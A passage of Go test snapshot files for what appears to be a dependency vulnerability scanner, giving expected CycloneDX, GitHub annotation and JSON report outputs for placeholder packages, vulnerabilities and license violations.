"OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine3@0.10.2-rc", "type": "library", "name": "mine3", "version": "0.10.2-rc", "licenses": [], "purl": "pkg:npm/mine3@0.10.2-rc" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [], "detail": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [], "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- ================================================ FILE: internal/output/__snapshots__/githubannotation_test.snap ================================================ [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/no_sources - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | 7.8 | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_deprecated_package - 1] ::error file=path/to/lockfile::path/to/lockfile%0A+----------------+-----------------+------------+%0A| PACKAGE | CURRENT VERSION | DEPRECATED |%0A+----------------+-----------------+------------+%0A| deprecated-pkg | 1.0.0 | true |%0A+----------------+-----------------+------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| author1/mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| author1/mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| author3/mine3 | https://osv.dev/OSV-3 | 4.3 | 0.4.1 | |%0A| author3/mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| author1/mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| author1/mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| author3/mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| author3/mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| author1/mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| author1/mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | | |%0A+---------------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| author3/mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| author3/mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/no_sources - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine1 | https://osv.dev/GHSA-123 | | 1.2.3 | |%0A+---------+--------------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | 9 | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| | https://osv.dev/GHSA-123 | | | |%0A+---------+--------------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | 8.3 | 1.2.3 | |%0A| | https://osv.dev/GHSA-123 | | | |%0A+---------+--------------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| | https://osv.dev/GHSA-123 | | | |%0A+---------+--------------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine3 | https://osv.dev/OSV-2 | | 0.10.2-rc | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- ================================================ FILE: internal/output/__snapshots__/machinejson_test.snap ================================================ [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ 